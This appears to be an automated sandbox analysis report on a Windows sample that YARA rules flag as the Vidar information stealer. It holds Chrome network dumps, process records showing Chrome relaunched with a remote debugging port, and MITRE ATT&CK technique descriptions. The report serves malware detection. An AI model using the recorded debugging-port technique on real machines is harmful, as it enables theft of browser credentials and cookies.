2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 Data Ascii: d gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u0
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c Data Ascii: e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div\u003e\u003c\/div\u003e\
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 Data Ascii: bindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 Data Ascii: -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 36 2c 33 37 30 30 39 34 39 2c 33 37 30 31 30 37 30 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c Data Ascii: -label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700316,3700949,3701070,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\
2025-03-19 13:02:26 UTC	935	IN	Data Raw: 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 74 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 73 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 75 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 Data Ascii: b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};td\u003dfunction(a){return new _.sd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.ud\u003dglobalThis.trust
2025-03-19 13:02:26 UTC	395	IN	Data Raw: 31 38 34 0d 0a 69 66 28 74 79 70 65 6f 66 20 61 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 28 30 2c 5f 2e 49 61 29 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 44 64 29 72 65 74 75 72 6e 20 61 3b 74 72 79 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 63 5c 75 30 30 33 64 5c 75 30 30 33 65 63 3b 61 5c 75 30 30 33 64 44 64 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 5c 22 6f 67 62 2d 71 74 Data Ascii: 184if(typeof a!\u003d\u003d\"number\")return;return(0,_.Ia)(a)?a\|0:void 0};_.Cd\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Ed\u003dfunction(){let a\u003dnull;if(!Dd)return a;try{const b\u003dc\u003d\u003ec;a\u003dDd.createPolicy(\"ogb-qt
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 46 64 5c 75 30 30 33 64 45 64 28 29 29 3b 72 65 74 75 72 6e 20 46 64 7d 3b 5c 6e 5f 2e 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 47 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 48 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 4b 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 66 75 6e 63 74 69 Data Ascii: 8000Fd\u003dEd());return Fd};\n_.Id\u003dfunction(a){const b\u003d_.Gd();return new _.Hd(b?b.createScriptURL(a):a)};_.Jd\u003dfunction(a){if(a instanceof _.Hd)return a.i;throw Error(\"H\");};_.Ld\u003dfunction(a){if(Kd.test(a))return a};_.Md\u003dfuncti
2025-03-19 13:02:26 UTC	1390	IN	Data Raw: 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c Data Ascii: c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49713	142.250.186.164	443	8048	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:02:26 UTC	393	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-19 13:02:26 UTC	970	IN	HTTP/1.1 200 OK Version: 736403927 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Wed, 19 Mar 2025 13:02:26 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-19 13:02:26 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-03-19 13:02:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Statistics

CPU Usage

• random(2).exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• random(2).exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	09:00:07
Start date:	19/03/2025
Path:	C:\Users\user\Desktop\random(2).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random(2).exe"
Imagebase:	0x400000
File size:	1'822'720 bytes
MD5 hash:	5E941E7C271E85093CB8344FB7CAB50B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	09:02:19
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:02:21
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:02:26
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:03:13
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:04:10
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	09:04:24
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7ea9f0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	09:04:57
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:05:41
Start date:	19/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
